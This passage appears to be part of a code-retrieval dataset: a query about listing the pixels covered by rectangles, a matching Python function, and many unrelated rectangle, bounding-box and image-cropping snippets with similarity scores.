# gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def brute_force_rectangles_in_grid(x, y):\n s = set(imap(lambda a: hasher(*a), combinations(grid(x, y), 2)))\n s.discard(0)\n return len(s)", "def extract_walls(img_array,x_scale,y_scale,wall_height):\n\n wall_th = 2\n length = 0\n wall_list = []\n\n #check for horizontal walls first\n for row in range(img_array.shape[0]):\n for col in range(img_array.shape[1]):\n \n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if left_edge(sec):\n #check two steps to the right\n next_sec = img_array.astype(int)[row:row+2, col+1:col+3]\n next_next_sec = img_array.astype(int)[row:row+2, col+2:col+4]\n\n #if horizontal wall, get coordinates and count length\n if is_wall(next_sec) and not right_edge(next_next_sec): \n #record corner coordinates\n x = col +1\n y = row\n while is_wall(next_sec):\n #start counting length across, until right edge found\n length +=1\n col +=1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list \n new_wall = Wall(x*x_scale,y*y_scale,length*x_scale,wall_th*y_scale,wall_height)\n wall_list.append(new_wall)\n length = 0\n\n #check for vertical walls\n for col in range(img_array.shape[1]):\n for row in range(img_array.shape[0]):\n\n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if top_edge(sec): \n #check two steps below\n next_sec = img_array.astype(int)[row+1:row+3, col:col+2]\n next_next_sec = img_array.astype(int)[row+2:row+4, col:col+2]\n\n #if vertical wall, get coordinates and count length\n if is_wall(next_sec) and is_wall(next_next_sec):\n x = col\n y = row\n while is_wall(next_sec):\n #start counting length downwards, until bottom edge found\n length += 1\n row += 1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list\n new_wall = Wall(x*x_scale,y*y_scale,wall_th*x_scale,length*y_scale, wall_height)\n wall_list.append(new_wall)\n length = 0\n\n return wall_list", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def Recursive_Rectangles(*args):\n if len(args) == 1 and isinstance(args[0], Rectangle):\n rectangle = args[0]\n else:\n rectangle = Rectangle(*args)\n dx, dy = rectangle.vertices[0]\n if (dx, dy) == (0, 0):\n return _Recursive_Rectangles(*rectangle.vertices[1])\n\n rects = _Recursive_Rectangles(*rectangle.translated(-dx, -dy).vertices[1])\n return set(r.translated(dx, dy) for r in rects)\n # return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def intersect(x):\n if len(x) < 2:\n return x\n\n # Make sure everybody have the same shape\n first_shape = tuple(x[0].shape)\n for pixmap in x[1:]:\n if first_shape != tuple(pixmap.shape):\n return []\n\n return [(np.prod(np.array(x), axis=0) > 0).astype(int)]", "def rect(rng, lines, columns):\n\n w = rng.randint(1, max(1, lines // 2))\n h = rng.randint(1, max(1, columns // 2))\n\n i = rng.randint(0, lines - h)\n j = rng.randint(0, columns - w)\n \n return i, j, w, h", "def _find_bboxes_in_rect(bboxes, left, bottom, right, top):\n result = (bboxes[:, 0] <= right) & (bboxes[:, 2] >= left) & \\\n (bboxes[:, 1] <= top) & (bboxes[:, 3] >= bottom)\n return result", "def constructRectangle(self, area: int) -> List[int]:\n w = int(area ** 0.5)\n while area % w:\n w -= 1\n\n return [area // w, w]", "def crop_image(image,list_coordinate):\n list_character = []\n lp_image = imutils.resize(image,width = 200)\n for bbox in list_coordinate:\n if bbox[0][0] == bbox[0][1] == bbox[1][0] == bbox[1][1]:\n break\n\n pts = np.array([(bbox[0][0],bbox[0][1]),\n (bbox[1][0],bbox[1][1]),\n (bbox[2][0],bbox[2][1]),\n (bbox[3][0],bbox[3][1])],dtype = \"float32\")\n \n warped = four_point_transform(lp_image,pts)\n\n # _,warped = cv2.threshold(cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY),0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # warped = cv2.resize(warped,(12,28))\n warped = resize_and_pad(warped, (28,28), padColor= 255)\n warped = warped / 255.0\n\n # warped = warped[..., None]\n list_character.append(warped)\n return list_character", "def bound_shapes(contours):\r\n\r\n contours_poly = [None]*len(contours)\r\n boundRect = [None]*len(contours)\r\n centers = [None]*len(contours)\r\n radius = [None]*len(contours)\r\n for i, c in enumerate(contours):\r\n contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])\r\n \r\n return (contours_poly, boundRect, centers, radius)", "def _crop_region(polygons, left, bottom, right, top, precision):\n cropped_polygons = []\n for p in polygons:\n clipped_polys = clipper._chop(p, [top, bottom], 1, 1 / precision)\n # polygon, [cuts], axis, scale\n for cp in clipped_polys[1]:\n result = clipper._chop(cp, [left, right], 0, 1 / precision)\n cropped_polygons += list(result[1])\n return cropped_polygons", "def _recursive_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {((0, 0), (1, 1)), }\n if x == 1:\n return _recursive_rectangles(x, y-1) | set(((0, j), (x, y)) for j in range(y))\n if y == 1:\n return _recursive_rectangles(x-1, y) | set(((i, 0), (x, y)) for i in range(x))\n return _recursive_rectangles(x-1, y) | _recursive_rectangles(x, y-1) | \\\n set(((i, j), (x, y)) for i in range(x) for j in range(y))", "def _find_largest_rects_in_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(((i, 0), (j, y))) # Pairs of pairs\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def gen_crop_area(x_res, y_res, dim):\n crop_area = []\n\n for x in range(math.floor(dim[0] / x_res)):\n for y in range(math.floor(dim[1] / y_res)):\n left = x * x_res\n right = left + x_res\n upper = y * y_res\n lower = upper + y_res\n crop_area.append((left, upper, right, lower))\n\n return crop_area", "def quadkeys_to_bounds(quadkeys: List[str]):\n tile_bounds = [\n mercantile.bounds(mercantile.quadkey_to_tile(qk)) for qk in quadkeys\n ]\n\n minx = 180\n miny = 90\n maxx = -180\n maxy = -90\n for tb in tile_bounds:\n minx = min(minx, tb[0])\n miny = min(miny, tb[1])\n maxx = max(maxx, tb[2])\n maxy = max(maxy, tb[3])\n\n return [minx, miny, maxx, maxy]", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def bbox_from_circle(img, circles):\n seg_imgs = []\n bboxes = []\n aux = img.copy()\n for i,el in enumerate(circles):\n bbox = circle_2_bbox(el['coord'])\n bbox = fix_bbox(bbox,aux.shape)\n cv.rectangle(aux,bbox[0],bbox[1],(0,255,0))\n bboxes.append(bbox)\n return bboxes", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def get_patches(points, h, w, patches=[[450, 100, 10, 10], [450, 500, 10, 10]], min_valid_percent=0.75):\n pc_image = points.reshape((h, w, 3))\n pc_patches = []\n for patch in patches:\n possible_patch = pc_image[patch[0]:patch[0] + patch[2], patch[1]:patch[1] + patch[3]]\n possible_patch = possible_patch.reshape(possible_patch.size // 3, 3)\n possible_patch = filter_zero(possible_patch)\n if possible_patch.shape[0] > min_valid_percent * (patch[2] * patch[3]):\n pc_patches.append(possible_patch)\n return pc_patches", "def __areas_to_pool(self, region_width, region_height, region_width_step, region_height_step):\n \n areas = [[(width_ind * region_width_step, height_ind * region_height_step,\n (width_ind + 1) * region_width_step if (width_ind + 1) < self.width else region_width,\n (height_ind + 1) * region_height_step if (height_ind + 1) < self.height else region_height) for width_ind in range(self.width)] for height_ind in range(self.height)]\n\n return areas", "def covering_box(boxes):\n x_min = np.amin([b.x for b in boxes])\n x_max = np.amax([b.x + b.width for b in boxes])\n y_min = np.amin([b.y for b in boxes])\n y_max = np.amax([b.y + b.height for b in boxes])\n cover = Box(x_min, y_min, x_max - x_min, y_max - y_min)\n return cover", "def draw(list_rectangles, list_squares):\n\n art = turtle.Turtle()\n\n def set_position(x, y):\n art.penup()\n art.goto(x, y)\n art.pendown()\n\n def beauty_rectangle(width, height, art):\n art.begin_fill()\n for i in range(2):\n art.forward(width)\n art.right(90)\n art.forward(height)\n art.right(90)\n art.end_fill()\n\n for rectangle in list_rectangles:\n art.color(\"#800080\")\n set_position(rectangle.x, rectangle.y)\n beauty_rectangle(rectangle.width, rectangle.height, art)\n set_position(-1 * rectangle.x, -1 * rectangle.y,)\n\n for square in list_squares:\n art.color(\"#40E0D0\")\n set_position(square.x, square.y)\n beauty_rectangle(square.size, square.size, art)\n set_position(-1 * square.x, -1 * square.y)\n\n turtle.done()", "def extract(pixels, rmin, rmax, cmin, cmax):\n copy = blank_image(rmax-rmin, cmax -cmin) \n for r in range(rmin, rmax):\n for c in range(cmin, cmax):\n copy[r-rmin][c-cmin] = pixels[r][c]\n return copy", "def rect(coords : Tuple[int, int]) -> Tuple[int, int, int, int]:\n min_x = min([x for x, _ in coords])\n max_x = max([x for x, _ in coords])\n min_y = min([y for _, y in coords])\n max_y = max([y for _, y in coords])\n\n return (min_x, max_x, min_y, max_y)", "def del_rectangles(image, rects):\n for r in rects:\n cv2.rectangle(image,\n (r.x, r.y),\n (r.x + r.w - 1, r.y + r.h - 1),\n color=0,\n thickness=-1)", "def bounding_boxes(self, detections):\n bboxes = []\n while len(detections) > 0:\n det = detections.pop(0)\n merging = True\n while merging:\n merging = False\n pointer = 0\n while pointer < len(detections):\n if self.get_distance(det, detections[pointer]) <= self.max_distance:\n det = self.merge_boxes(det, detections[pointer])\n merging = True\n detections.pop(pointer)\n else:\n pointer += 1\n if det[4] >= self.min_area:\n bboxes.append(det)\n return bboxes", "def find_squares( contours, debug=False ):\r\n #=================================================================\r\n # The Minimum and Maximum rations for width vs height for the goal\r\n # based on experimental results goal is approx 1.5:1\r\n #=================================================================\r\n MIN_RATIO = 1.3\r\n MAX_RATIO = 1.8\r\n ret = []\r\n\r\n for shape in contours:\r\n x, y, w, h = cv2.boundingRect( shape )\r\n w_h_ratio = float( w ) / float( h )\r\n if debug:\r\n print \"Area\", (w * h)\r\n print \"Width \", w\r\n print \"Height\", h\r\n if MIN_RATIO < w_h_ratio and w_h_ratio < MAX_RATIO:\r\n ret.append( shape )\r\n\r\n return( ret )", "def find_obstacle_loc(self, obstacle_list):\n\n x_obst = []\n y_obst = []\n #x_obst_append = x_obst.append\n #y_obst_append = y_obst.append\n locs = []\n\n for x in obstacle_list:\n if x < self.width:\n x_obst.append(x*self.resolution + self.resolution/2)\n else:\n x_obst.append((x % self.width)*self.resolution + self.resolution/2)\n\n for y in obstacle_list:\n y_obst.append((y/self.width)*self.resolution + self.resolution/2)\n\n locs = map(lambda x: x, zip(x_obst, y_obst))\n\n return(locs)", "def obscure(rects):\n image = Image.open('/tmp/.i3lock.png')\n\n for rect in rects:\n area = (\n rect.x, rect.y,\n rect.x + rect.width,\n rect.y + rect.height\n )\n\n cropped = image.crop(area)\n cropped = obscure_image(cropped)\n image.paste(cropped, area)\n overlay = Image.open('/home/robin/Documents/source/scripts/src/locked.png')\n image.paste(overlay, tuple([(i-o)/2 for i,o in zip(image.size,overlay.size)]), overlay)\n image.save('/tmp/.i3lock.png')", "def extract_roi(reg_with_roi, ir_with_roi, reg_unmarked, ir_unmarked):\n roi_pos = np.where( reg_with_roi[:,:,2] == 255 ) \n \n x = list(roi_pos[0])\n y = list(roi_pos[1])\n \n #make a 2-d mask\n \n mask = np.zeros_like(reg_with_roi[:,:,1])\n mask[x,y] = 255\n \n _, cntrs = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[:2]\n\n reg_roi_list = []\n ir_roi_list = []\n \n #masks = []\n for cnt in cntrs:\n \n if reg_unmarked.ndim == 3:\n reg_unmarked = cv2.cvtColor(reg_unmarked, cv2.COLOR_BGR2GRAY)\n \n if ir_unmarked.ndim == 3:\n ir_unmarked = cv2.cvtColor(ir_unmarked, cv2.COLOR_BGR2GRAY)\n \n temp_mask = np.zeros_like(reg_unmarked)\n cv2.fillPoly(temp_mask, [cnt], (255,255,255))\n #masks.append(temp_mask)\n \n reg_roi = cv2.bitwise_and(temp_mask, reg_unmarked)\n ir_roi = cv2.bitwise_and(temp_mask, ir_unmarked)\n \n x, y, w, h = cv2.boundingRect(cnt)\n reg_roi = reg_roi[y:y+h, x:x+w]\n ir_roi = ir_roi[y:y+h, x:x+w]\n \n reg_roi_list.append(reg_roi)\n ir_roi_list.append(ir_roi)\n \n return reg_roi_list, ir_roi_list, cntrs", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def bisect_rectange(numSplits, minlat, minlong, maxlat, maxlong):\n #initialize function variables\n longpoints = []\n latpoints = []\n extents = []\n\n #Get a list of the split lat/long locations in the rectangle\n for i in range(numSplits+1):\n latpoints.append( (minlat + ((maxlat-minlat)/numSplits)*i) )\n longpoints.append( (minlong + ((maxlong-minlong)/numSplits)*i) )\n\n #Loop through the line locations and create a list of sub-rectangles\n for latindex, latmin in enumerate(latpoints):\n for longindex, longmin in enumerate(longpoints):\n if latindex<(len(latpoints)-1) and longindex<(len(longpoints)-1):\n newextent = [latmin, longmin, latpoints[latindex+1], longpoints[longindex+1]]\n extents.append(newextent)\n return extents", "def crop(self, rect):\n maybe_cropped_area = self.to_bbox().crop(rect)\n if len(maybe_cropped_area) == 0:\n return []\n else:\n [cropped_area] = maybe_cropped_area\n cropped_origin = PointLocation(row=cropped_area.top, col=cropped_area.left)\n cropped_area_in_data = cropped_area.translate(drow=-self._origin.row, dcol=-self.origin.col)\n return [MultichannelBitmap(data=cropped_area_in_data.get_cropped_numpy_slice(self._data),\n origin=cropped_origin,)]", "def cuts(self) -> list[list[int]]:\n if self._cuts is not None:\n return self._cuts\n width = self.width\n height = self.height\n screen_region = Region(0, 0, width, height)\n cuts_sets = [{0, width} for _ in range(height)]\n\n if self.map is not None:\n for region, order, clip in self.map.values():\n region = region.intersection(clip)\n if region and (region in screen_region):\n region_cuts = region.x_extents\n for y in region.y_range:\n cuts_sets[y].update(region_cuts)\n\n # Sort the cuts for each line\n self._cuts = [sorted(cut_set) for cut_set in cuts_sets]\n return self._cuts", "def _find_largest_Rectangles_in_cross_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(Rectangle((i, 0), (j, y), aligned_with_grid=False))\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def surround(self, p):\n res = set([])\n if p.x + 1 < self.height:\n res.add((p.x + 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x + 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x + 1, p.y - 1))\n res.add((p.x, p.y - 1))\n if p.x - 1 >= 0:\n res.add((p.x - 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x - 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x - 1, p.y - 1))\n res.add((p.x, p.y - 1))\n return res", "def uniform_rect(mouth, face, width, height):\n if mouth is None:\n return None\n\n mc_x, mc_y = mouth[0] + 0.5 * mouth[2], mouth[1] + 0.5 * mouth[3] # Mouth center point.\n\n rect_bottom = mc_y + 0.5 * height\n\n rect_x = mc_x - 0.5 * width\n rect_y = mc_y - 0.5 * height - max(0, rect_bottom - (face[2] + face[3]))\n\n return [int(round(i)) for i in [rect_x, rect_y, width, height]]", "def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:\n prev = selected_corners[-1]\n for corner in selected_corners:\n # interpolate line segments to the image border\n clip_prev, clip_corner = clip_segment_v3_plane_n(\n copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)\n )\n prev = corner\n if clip_prev is None or clip_corner is None:\n continue\n a, b = clip_line_segment(clip_prev, clip_corner, K)\n clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])\n clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])\n\n return clipped_uv_verts", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def framewise_inside_rectangle_roi(\n bp_location: np.ndarray, roi_coords: np.ndarray\n ) -> np.ndarray:\n results = np.full((bp_location.shape[0]), 0)\n within_x_idx = np.argwhere(\n (bp_location[:, 0] <= roi_coords[1][0])\n & (bp_location[:, 0] >= roi_coords[0][0])\n ).flatten()\n within_y_idx = np.argwhere(\n (bp_location[:, 1] <= roi_coords[1][1])\n & (bp_location[:, 1] >= roi_coords[0][1])\n ).flatten()\n for i in prange(within_x_idx.shape[0]):\n match = np.argwhere(within_y_idx == within_x_idx[i])\n if match.shape[0] > 0:\n results[within_x_idx[i]] = 1\n return results", "def get_dancefloor_area(self):\n cords = []\n\n x1 = self.coordinates[0]\n y1 = self.coordinates[1]\n x2 = self.coordinates[0] + self.width\n y2 = self.coordinates[1] + self.height\n if self.width <= 0:\n x1, x2 = x2, x1\n if self.height <= 0:\n y1, y2 = y2, y1\n\n for x in range(x1, x2):\n for y in range(y1, y2):\n if x % 20 == 0 and y % 20 == 0:\n cords.append([x, y])\n return cords", "def test_tiles_to_bounds():\n tiles = [morecantile.Tile(x=150, y=182, z=9), morecantile.Tile(x=151, y=182, z=9)]\n assert len(utils.tiles_to_bounds(tiles)) == 4", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def rectIntersect(rect1, rect2):\n rect = np.zeros_like(rect1)\n rect[[0, 2]] = np.maximum(rect1[[0, 2]], rect2[[0, 2]])\n rect[[1, 3]] = np.minimum(rect1[[1, 3]], rect2[[1, 3]])\n return rect", "def drawRectangle(img, boxs_t, boxs_p, unseenName):\n img_p = img.copy()\n img_t = img.copy()\n for b in boxs_t:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_t, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(img_t, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (0, 255, 0), 1)\n\n for b in boxs_p:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_p, (x1, y1), (x2, y2), (255, 0, 0), 2)\n cv2.putText(img_p, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (255, 0, 0), 1)\n\n return img_t, img_p", "def compute_bb(self):\n all_shapes = list(self.parts.values()) + list(self.edges.values())\n bbox_vertices = cascaded_union(all_shapes).envelope.exterior.coords.xy\n min_x = min(bbox_vertices[0])\n max_x = max(bbox_vertices[0])\n min_y = min(bbox_vertices[1])\n max_y = max(bbox_vertices[1])\n return [min_x, max_x,min_y, max_y]", "def order_rect(pts):\n new = np.zeros((4, 2), dtype=\"int64\")\n s = pts.sum(axis=1)\n new[0] = pts[np.argmin(s)]\n new[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n new[1] = pts[np.argmin(diff)]\n new[3] = pts[np.argmax(diff)]\n\n return new" ]
[ "0.6603085", "0.65592986", "0.65554035", "0.6548141", "0.65277016", "0.6455441", "0.6452907", "0.644425", "0.64078", "0.6345731", "0.63407683", "0.63396865", "0.6298158", "0.62660736", "0.6236707", "0.6198757", "0.61927736", "0.6180278", "0.616941", "0.61400336", "0.61380047", "0.61268324", "0.60898894", "0.6073675", "0.6072698", "0.6070401", "0.6061438", "0.60273147", "0.60273147", "0.6014901", "0.5993387", "0.59888077", "0.59734184", "0.5972689", "0.5959817", "0.5957508", "0.5954441", "0.5953578", "0.5952327", "0.5933188", "0.59206903", "0.5910768", "0.59082067", "0.59061646", "0.59020704", "0.5900496", "0.58889043", "0.588566", "0.5876024", "0.5875951", "0.5875098", "0.5847622", "0.58456403", "0.5806956", "0.5806725", "0.57992303", "0.57897335", "0.57867193", "0.5781939", "0.57803303", "0.57756215", "0.57704186", "0.57663196", "0.5756401", "0.5745564", "0.5742384", "0.5741134", "0.57349485", "0.5725382", "0.57234555", "0.57188404", "0.5718798", "0.5709828", "0.5709765", "0.5704823", "0.5702783", "0.5701929", "0.5698742", "0.5696873", "0.56939584", "0.5692093", "0.5683948", "0.5683468", "0.5678863", "0.5678056", "0.56652886", "0.5663054", "0.5662298", "0.5657033", "0.5640503", "0.5634824", "0.56299037", "0.5628786", "0.56267774", "0.5621313", "0.5613953", "0.56133395", "0.56097555", "0.560335", "0.5599544" ]
0.59542006
37
From the list of rectangles, build a list of pixels that these rectangles cover
def _build_list_of_excluded_pixels(self, exclude_zones): pixels = [] for x, y, width, height in exclude_zones: for row in range(height): for col in range(width): pixels.append(Pixel(col + x, row + y)) return pixels
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rect(rows: int, cols: int, top: int = 0,\n left: int = 0) -> List['GridQubit']:\n return [\n GridQubit(row, col)\n for row in range(top, top + rows)\n for col in range(left, left + cols)\n ]", "def find_rects(image: np.ndarray) -> List[np.ndarray]:\n\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray)\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n boxes = Rect.nms_merge(boxes)\n\n return boxes or list()", "def extract_valid_rects(rects, img, others_landmark_pts):\n # Extraction\n dst = list()\n for rect in rects:\n # Check if others landmarks are contained\n for others_pt in others_landmark_pts:\n if rect_contain(rect, others_pt):\n break\n else:\n dst.append(rect)\n\n # avoid no rectangle\n if len(dst) == 0:\n dst.append((0, 0, img.shape[1], img.shape[0]))\n\n return dst", "def normalizeRects(rects):\n\tsmallestX = min(rect[0] for rect in rects)\n\tsmallestY = min(rect[1] for rect in rects)\n\treturn list(\n\t\t(-smallestX + left,\n\t\t -smallestY + top,\n\t\t -smallestX + right,\n\t\t -smallestY + bottom) for left, top, right, bottom in rects\n\t)", "def find_overlap_rect_list(rect_list):\n\n\n overlap_list = []\n\n for index, item in enumerate(rect_list):\n index += 1\n\n while index < len(rect_list):\n #check item with next rectangle in the list\n x_overlap = find_overlap_range(item['left_x'], item['width'], \n rect_list[index]['left_x'],\n rect_list[index]['width'])\n \n y_overlap = find_overlap_range(item['bottom_y'], item['height'], \n rect_list[index]['bottom_y'],\n rect_list[index]['height'])\n\n if x_overlap and y_overlap:\n overlap_list.append({'left_x':x_overlap[0], \n 'bottom_y': y_overlap[0],\n 'width': x_overlap[1],\n 'height': y_overlap[1]})\n\n index += 1\n\n return overlap_list", "def getBigRectangles(recognisedFacesCenters, recognisedFacesPercentages, recognisedFacesCenterSizes):\n recognisedBigFacesCenters = []\n recognisedBigFacesCentersSizes = []\n recognisedBigFacesPercentages = []\n\n \"\"\"Putting the higest probability frame in the final array by default\"\"\"\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n\n recognisedBigFacesCenters.append(recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n\n \"\"\"Purging initial arrays of the values we just put in the final arrays\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n\n for i in range(len(recognisedFacesCenters)):\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n test = getTowCornersOfRectangle(\n recognisedFacesCenters[maxposCenters], recognisedFacesCenterSizes[maxposCenters], recognisedBigFacesCenters, recognisedBigFacesCentersSizes)\n \"\"\"If the area are not overlapping then add the tested frame into the final arrays\"\"\"\n if(test == 1):\n recognisedBigFacesCenters.append(\n recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n \"\"\"Purging initial arrays of the tested values\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n return [recognisedBigFacesCenters, recognisedBigFacesCentersSizes, recognisedBigFacesPercentages]", "def get_rectangles_from_mask(img_arr):\n masks_point_dict = _get_mask_points(img_arr)\n mar_list = list()\n for object_id in masks_point_dict.keys():\n mask_points = masks_point_dict[object_id]\n mask_points = tuple(mask_points)\n hull_ordered = [mask_points[index] for index in ConvexHull(mask_points).vertices]\n hull_ordered.append(hull_ordered[0]) # making it cyclic, now first and last point are same\n\n # not a rectangle\n if len(hull_ordered) < 5:\n continue\n\n hull_ordered = tuple(hull_ordered)\n min_rectangle = _bounding_area(0, hull_ordered)\n for i in range(1, len(hull_ordered) - 1):\n rectangle = _bounding_area(i, hull_ordered)\n if rectangle['area'] < min_rectangle['area']:\n min_rectangle = rectangle\n\n min_rectangle['unit_vector_angle'] = atan2(min_rectangle['unit_vector'][1],\n min_rectangle['unit_vector'][0])\n\n min_rectangle['rectangle_center'] = _to_xy_coordinates(min_rectangle['unit_vector_angle'],\n min_rectangle['rectangle_center'])\n rect_corners = _rectangle_corners(min_rectangle)\n\n rect_corners = tuple(rect_corners)\n points_ordered = [rect_corners[index] for index in ConvexHull(rect_corners).vertices]\n mar_list.append(points_ordered)\n return mar_list", "def get_panels(rectangles):\n\n pairs = []\n for rect in rectangles:\n if (2 * rect[1][0] < rect[1][1]) or (rect[1][0] > 2 * rect[1][1]):\n if 2 * rect[1][0] < rect[1][1]:\n long_dim1 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim1 = 1\n\n box = cv2.boxPoints(rect)\n box2 = []\n min_angle = 10;\n for rect2 in rectangles:\n if 2 * rect[1][0] < rect[1][1]:\n long_dim2 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim2 = 1\n if (rect2 != rect) and (abs(rect[2] - rect2[2]) 